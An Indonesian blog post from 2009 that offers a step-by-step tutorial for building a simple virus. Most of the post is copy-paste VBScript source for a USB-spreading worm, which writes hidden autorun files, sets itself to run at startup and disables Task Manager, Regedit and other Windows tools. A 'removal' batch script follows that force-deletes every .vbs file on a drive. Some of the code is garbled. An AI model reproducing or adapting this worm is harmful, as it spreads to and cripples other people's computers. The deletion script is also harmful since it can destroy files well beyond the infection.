Cara Membuat Virus Sederhana & Pencegahannya

03/03/2009 at 06:14 | Posted in PC | 4 Comments

Anda muak terkena virus, sama! saya juga! hehe..

Tips kali ini akan membahas pembuatan sebuah virus sederhana yang lengkap dengan pencegahannya. Pada tips kali ini, aplikasi yang digunakan tidak perlu menggunakan software canggih.. cukup dengan menggunakan aplikasi text editor sederhana tapi mumpuni (dalam hal ini, penulis menggunakan aplikasi Notepad bawaan Windows).. he..

Untuk virus, penulis menggunakan contoh coding sederhana sebuah virus lalu penulis lanjut dengan membahas penghapusan virus tersebut melalui command prompt. Semua coding pada tips ini berhasil dibuat melalui aplikasi text editor (notepad) dan bekerja pada Windows XP SP2. Baik coding virus dan coding penghapusan, berjalan dengan sukses tanpa ada aral melintang. Untuk mengembalikan fungsi Windows yang dimatikan oleh coding virus, silahkan gunakan aplikasi utilitas seperti WinBoost atau WinXP Manager (atau keduanya) maupun aplikasi utilitas lainnya karena terlalu banyak manipulasi registry yang dilakukan oleh coding virus ini.. penulis sudah sangat mengantuk untuk membahas pengembalian fitur Windows.. hehe.. mungkin akan dibahas di lain kesempatan.

Penulis dan sumber-sumber penulis tidak bertanggung jawab dan/atau tidak dapat dimintakan pertanggung jawaban atas kerusakan yang timbul sebagai akibat dari penerapan tips ini. Resiko menerapkan tips ini adalah tanggungan pribadi!!

  1. Berikut adalah contoh coding dari virus Rangga-Zay yang coding-nya saya temukan pada sebuah blog. Copy-Paste coding berikut lalu ubah baris yang dicetak tebal atau cetak miring:

    ‘//–Awal dari coding, Memaksa Windows Untuk Mengabaikan Pesan Error Lalu Lanjut Mengeksekusi Baris Perintah Selanjutnya–//
    on error resume next

    ’//–Dim Kata Kunci Berikut–//
    dim rekur,windowpath,flashdrive,fs,mf,isi,tf,namavirus,nt,check,sd

    ‘//–Membuat Sebuah File Autorun Setup Information–//
    isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe namavirus.ext
    set fs = createobject(”Scripting.FileSystemObject”)
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text = mf.openastextstream(1,-2)
    do while not text.atendofstream
    rekur = rekur & text.readline
    rekur = rekur & vbcrlf
    loop
    do

    ‘//–Membuat Sebuah File Induk Virus Pada Folder Windows (contoh: C:WINDOWS)-//
    Set windowpath = fs.getspecialfolder(0)
    set tf = fs.getfile(windowpath & “batch- namavirus.ext “)
    tf.attributes = 32
    set tf=fs.createtextfile(windowpath & “batch- namavirus.ext”,2,true)
    tf.write rekursif
    tf.close
    set tf = fs.getfile(windowpath & “batch- namavirus.ext “)
    tf.attributes = 39

    ‘//–Membuat File Autorun Yang Akan Dieksekusi Secara Otomatis–//
    ‘Menggandakan diri apabila tipe drive adalah 1 dan 2 (removable) termasuk disket
    for each flashdrive in fs.drives

    ‘//–Melakukan Pemeriksaan Tipe Drive–//
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then

    ‘//–Perintah Untuk Menyebarkan File Virus Ke Drive Lain Dengan Tipe Drive 1, 2, Atau Dengan Path A:–//
    set tf=fs.getfile(flashdrive.path &”namavirus.ext “)
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &”namavirus.ext “,2,true)
    tf.write rekursif
    tf.close
    set tf=fs.getfile(flashdrive.path &”namavirus.ext “)
    tf.attributes = 39

    ‘//–Memanggil File Autorun Setup Information Untuk Di Masukkan Ke Dalam File Autorun–//
    set tf =fs.getfile(flashdrive.path &”autorun.inf”)
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &”autorun.inf”,2,true)
    tf.write isi
    tf.close
    set tf = fs.getfile(flashdrive.path &”autorun.inf”)
    tf.attributes=39
    end if
    next

    ‘//–Manipulasi Registry–//

    set namavirus = createobject(”WScript.Shell”)

    ‘//–Menambahkan Pesan Pada Title Bar Internet Explorer–//
    namavirus.regwrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainWindow Title”,” Masukkan pesan anda disini

    ‘//–Membuat File Dengan Attribut Hidden Tidak Ditampilkan Melalui Windows Explorer–//
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerAdvancedHidden”, “0?, “REG_DWORD”

    ‘//–Menghilangkan Menu Find, Folder Options, Run, dan Mematikan Regedit serta Task Manager–//
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFind”, “1?, “REG_DWORD”
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoFolderOptions”, “1?, “REG_DWORD”
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun”, “1?, “REG_DWORD”
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools”, “1?, “REG_DWORD”
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableTaskMgr”, “1?, “REG_DWORD”

    ‘//–Mematikan Fungsi Klik Kanan–//
    namavirus.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewContextMenu”, “1?, “REG_DWORD”

    ‘//–Memunculkan Pesan Setiap Windows Startup–//
    namavirus.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption”, “Masukkan pesan anda disini.

    ‘//–Membuat Windows Untuk Selalu Mengeksekusi Virus Pada Saat Startup–//
    namavirus.regwrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunSystemdir”, windowpath & “batch- namavirus.ext

    ‘//–Mengubah Registered Owner Dan Organization–//
    namavirus.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization”, “Masukkan Teks Disini
    namavirus.regwrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner”,”Masukkan Teks Disini

    ‘//–Melakukan Perulangan Fungsi Sleep–//
    if check 1 then
    Wscript.sleep 200000
    end if
    loop while check 1
    set sd = createobject(”Wscript.shell”)
    sd.run windowpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname

    ‘Akhir dari coding

  2. Simpan dengan nama file bebas tapi ekstensinya harus ".VBS"; agar bisa terbaca dan tereksekusi oleh Windows Scripting Host. Caranya FileSave As.... lalu pada bagian "Save as type" pilih “All Files (*.*)" dan masukkan ekstensi file (.vbs)
  3. Klik [Save]

Sekarang, kita akan membuat penghapusan virus tersebut:

  1. Buka aplikasi text editor (Notepad, Wordpad, dll..)
  2. Copy-Paste coding berikut pada text editor anda

    echo Anda yakin mau mengeksekusi penghapusan?
    PAUSE
    del /s /f C:*.vbs
    echo Penghapusan tahap pertama selesai, penghapusan tahap kedua akan dimulai...
    PAUSE
    del /f /q C:*.vbs
    echo Penghapusan selesai. Silahkan restart komputer anda.
    PAUSE
    EXIT

  3. Simpan file tersebut dengan nama file bebas tapi ekstensinya harus ".bat"
  4. Jalankan file tersebut dan tunggu hingga selesai
  5. Restart komputer

O iya, path "C:" bisa diganti dengan path menuju drive apa saja (A-Z) serta ekstensi file bisa diganti sesuai dengan ekstensi virus. Hati-hati ketika mengubah ekstensi penghapusan menjadi ".exe" karena semua file aplikasi pada drive tersebut akan terhapus tanpa kecuali!

Selamat mencoba! Trims.

4 Comments »

RSS feed for comments on this post. TrackBack URI

  1. Just want to say what a great blog you got here!
    I’ve been around for quite a lot of time, but finally decided to show my appreciation of your work!

    Thumbs up, and keep it going!

    Cheers
    Christian

  2. […] Cara Membuat Virus Sederhana & Pencegahannya […]

  3. mau nyoba tapi takut rusak nih leptop,,,,,klw rusak gak ada garansi,,,,,hehehehhehehehehe

    • gak prl khawatir.. kerusakan cm sebatas OS, ini bukan virus hardware kok..


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Blog at WordPress.com.
Entries and comments feeds.

%d bloggers like this: